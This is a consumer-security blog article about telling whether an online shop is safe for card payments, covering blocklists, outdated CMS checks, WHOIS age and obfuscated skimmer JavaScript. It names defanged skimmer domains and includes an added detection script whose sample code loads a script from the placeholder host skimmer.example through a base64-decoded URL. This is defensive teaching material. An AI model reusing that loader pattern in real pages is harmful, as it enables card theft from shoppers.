How do I know if a website is safe to use my credit card?

With regular news stories about corporate hacks, database breaches, internet-breaking vulnerabilities and online credit card theft, internet users are rightly anxious about making purchases online for fear that their personal information will be compromised by attackers. But where does legitimate worry end and outright paranoia begin? In this article, I’ll try to take some of that anxiety away and give users the knowledge to shop safely online.

It’s a big, scary web

In a previous two-part series on this blog, we detailed the general overview of the web-based e-commerce environment and explained why some websites are more prone to credit card theft than others.

E-commerce sites can be summed up in two main categories: e-commerce sites managed by dedicated companies and independent sites managed by the site administrators themselves. The first category includes larger and well-known platforms like Amazon, Shopify, Etsy and others. The latter includes all websites where the store has created its own e-commerce website, usually on shared or VPS hosting. It is in this latter category of independent websites that the overwhelming majority of credit card thefts occur. You can check out the series of articles I linked above for more context on why.

If you are unsure how to tell whether or not a website is using a managed platform, our SiteCheck tool can be a very useful friend! If you scan a website and navigate to the “JavaScript included” field of the “More details” section, it can give you relevant information. Here’s an example of how to determine if a website is using Shopify:

If you’re nervous about putting your credit card information into a checkout page, you don’t have to worry if the site uses a big, well-known platform like Shopify (assuming your computer/browser is not infected – make sure you are using antivirus software!). If you want to be on the safe side with a family-run e-commerce store, let’s explore some red flags you can watch out for.

Blocklist Resources

Credit card and online security companies take credit card fraud very seriously. They have dedicated teams of people working full time to make sure their customers are as protected from threats as possible. Credit card companies will collect data from common purchase points for cases of known fraud and often contact the administrator of the website in question to inform them of the threat. In severe cases, website administrators can be fined thousands of dollars for allowing their websites to come under attack. Taking website security seriously is of utmost importance if you are running such a store.

Authorities such as Google will maintain a blacklist of websites that are known distributors of malware or contain active threats loaded from malicious domains. Websites that violate Google’s security policies will quickly find themselves blocked.

If you see such a warning when trying to visit a website or payment page, I advise you not to continue. There are many other vendors (including ourselves) that maintain a list of known attack websites. You can always plug the online store in question into a website such as VirusTotal to see if it is reported by any vendors.

It should be mentioned that some providers are much more reputable than others. Just because a vendor reports the site doesn’t necessarily mean it’s infected. Some blocklist warnings will also be left over from a previous infection that has already been resolved, so this is not a panacea, just something to be aware of!

Antivirus programs

Security applications that actively monitor and protect your computer from malware and other threats will also often intercept suspicious traffic occurring in your web browser.

Different antivirus programs work in different ways, but they all try to protect you as much as possible. With the recent increase in web-based credit card theft, antivirus programs have actively improved their signatures and detection of these threats.

If you receive a warning/notification from your anti-virus program, you should not proceed with the purchase and it is advisable to inform the website owner of the warning.

Pro Tip: It’s always a good idea to provide a helpful screenshot when reporting issues!

Poorly maintained websites

The websites most often (but not always) affected by credit card theft malware are those that are not properly maintained. Although it’s not always possible to tell from the outside, sometimes you can! Our SiteCheck tool can identify websites that are running outdated versions of WordPress or other CMS platforms. Other tools such as MageReport (specific to Magento sites) will also attempt to determine if the site is missing any security patches:

Websites that lack security patches or use outdated CMS installations should be avoided out of caution.

Suspicious JavaScript

If you want to dig a little deeper, you can also put on your security analyst hat and use some of the same tools we use to identify threats on e-commerce websites. Two such tools that I would recommend are NoScript (for Firefox) and ScriptSafe (for Chrome).

These browser extensions are invaluable tools when examining the JavaScript that loads on a website. They also do a wonderful job of making the web browsing experience much more secure, although they are a bit tedious to get used to at first.

When you visit an e-commerce website, you can check if resources are loaded from suspicious domains.

Websites frequently grab JavaScript and other content from third-party domains, and it takes some experience to know what belongs and what doesn’t. If you are unsure, you can plug the domains into VirusTotal and see if there are any vendors flagging them as suspicious or malicious.

Here’s an example of a known credit card exfiltration domain that throws multiple warnings:

You can also run a whois command on a domain if you are unsure. Malicious domains tend to have a short lifecycle, so a recent registration date is a red flag:

$ whois  cdn-bootstrapcdn[.]com   
  Domain Name: CDN-BOOTSTRAPCDN[.]COM
  Registry Domain ID: 2616864123_DOMAIN_COM-VRSN
  Registrar WHOIS Server: whois.namesilo.com
  Registrar URL: http://www.namesilo.com
  Updated Date: 2021-09-17T19:20:07Z
  Creation Date: 2021-06-02T20:48:51Z
  Registry Expiry Date: 2022-06-02T20:48:51Z
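
The same check in script form, as an added example that is not part of the original article: it parses WHOIS output like the record above and flags a recently created domain. The 180-day threshold and the function names are assumptions.

```javascript
// Added example: parse registry-style WHOIS output and flag young domains.
// MAX_AGE_DAYS is an assumed threshold; the article does not give a number.
const MAX_AGE_DAYS = 180;

// WHOIS lines as shown in the article (domain left defanged).
const SAMPLE_WHOIS = `
  Domain Name: CDN-BOOTSTRAPCDN[.]COM
  Registrar WHOIS Server: whois.namesilo.com
  Updated Date: 2021-09-17T19:20:07Z
  Creation Date: 2021-06-02T20:48:51Z
  Registry Expiry Date: 2022-06-02T20:48:51Z
`;

// Turn "Key: value" lines into an object; keys are lower-cased, first wins.
function parseWhois(text) {
  const fields = {};
  for (const line of text.split(/\r?\n/)) {
    const m = line.match(/^\s*([^:]+?):\s*(.+?)\s*$/);
    if (m && !(m[1].toLowerCase() in fields)) fields[m[1].toLowerCase()] = m[2];
  }
  return fields;
}

// verdict is "recent", "established" or "unknown" (no usable creation date).
function assessDomainAge(whoisText, now, maxAgeDays = MAX_AGE_DAYS) {
  const f = parseWhois(whoisText);
  const domain = f["domain name"] || null;
  const created = new Date(f["creation date"] || "");
  if (Number.isNaN(created.getTime())) {
    // Redacted or differently formatted records must not be treated as safe.
    return { domain, ageDays: null, verdict: "unknown" };
  }
  const ageDays = Math.floor((now - created) / 86400000);
  return { domain, ageDays, verdict: ageDays < maxAgeDays ? "recent" : "established" };
}

// Evaluate the record as of its own "Updated Date".
console.log(assessDomainAge(SAMPLE_WHOIS, new Date("2021-09-17T19:20:07Z")));
```

An "established" verdict only means the age check did not fire; an old domain can still be compromised or malicious.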

Malware is sneaky by design, and its authors go to great lengths to disguise and otherwise obfuscate it. Here is an example of credit card theft JavaScript injection pretending to be the popular website analytics service HotJar:

At first glance this seems benign, until you notice the use of the atob function and some sneaky base64-encoded strings. Once the obfuscation is removed and the JavaScript is executed, it is effectively credit card skimming malware loading resources from a malicious domain, filetech[.]xyz.

It is worth mentioning that credit card theft malware can be both browser-side (JavaScript) and server-side (PHP). JavaScript malware can be detected by your antivirus program and by inspecting the front-end webpage. Server-side PHP malware, on the other hand, cannot! It works surreptitiously in the background and can siphon credit card details without any trace. Without access to the backend of the website, you only see half the story.
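
An added example (not from the original article) of how a defender can surface what such base64-encoded strings hide: it finds quoted base64 literals in script text, decodes them and lists any hostnames inside. The sample script is constructed, skimmer.example is a placeholder domain, and the function names are assumptions.

```javascript
// Added example: reveal hostnames hidden behind base64 literals in script text.
// SAMPLE_SCRIPT is constructed for illustration; it is not the injection from
// the article, and skimmer.example is a placeholder domain.
const SAMPLE_SCRIPT = `
(function (h, o, t) {
  h._hjSettings = { hjid: 1234567, hjsv: 6 };
  var s = o.createElement("script");
  s.src = atob("aHR0cHM6Ly9za2ltbWVyLmV4YW1wbGUvaC5qcw==") + "?v=" + t;
  o.head.appendChild(s);
})(window, document, Date.now());
`;

// Quoted base64 literals of 16+ characters; shorter ones are too noisy.
const B64_LITERAL = /["'`]([A-Za-z0-9+\/]{16,}={0,2})["'`]/g;

// Decode and keep only results that are fully printable ASCII (real text).
function decodePrintable(b64) {
  const text = Buffer.from(b64, "base64").toString("latin1");
  return /^[\x20-\x7e]+$/.test(text) ? text : null;
}

// Returns { usesAtob, decoded, hiddenHosts, suspicious } for one script body.
function inspectScript(source) {
  const decoded = [];
  const hosts = new Set();
  for (const m of source.matchAll(B64_LITERAL)) {
    const text = decodePrintable(m[1]);
    if (!text) continue;
    decoded.push(text);
    // Collect hosts from absolute or protocol-relative URLs in the decoded text.
    for (const u of text.matchAll(/(?:https?:)?\/\/([a-z0-9.-]+\.[a-z]{2,})/gi)) {
      hosts.add(u[1].toLowerCase());
    }
  }
  const usesAtob = /\batob\s*\(/.test(source);
  return { usesAtob, decoded, hiddenHosts: [...hosts], suspicious: usesAtob && hosts.size > 0 };
}

console.log(inspectScript(SAMPLE_SCRIPT));
```

This only catches whole base64 literals; strings that are split, reversed or otherwise transformed before decoding will not show up, so an empty result is not a clean bill of health.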

Prevention is better than cure

For an average web user, there’s really no way to know for sure if a website is safe to enter your credit card details on. Although users should beware, that’s not necessarily a reason to completely cut themselves off from the e-commerce world.

Do your best to exercise caution. Avoid websites that can be determined to be poorly maintained or blocked by reputable providers.

Credit card companies will do their best to block suspicious transactions, but be aware that once a credit card number is stolen, it’s usually only a matter of days before it’s sold on the black market. In the final analysis, your best bet is to regularly check your credit card statement for transactions you didn’t make yourself and contact your credit card company immediately if you see anything suspicious.

If you own an e-commerce website, consider signing up for our website security services to help protect your website from attackers and credit cards

Sherry J. Basler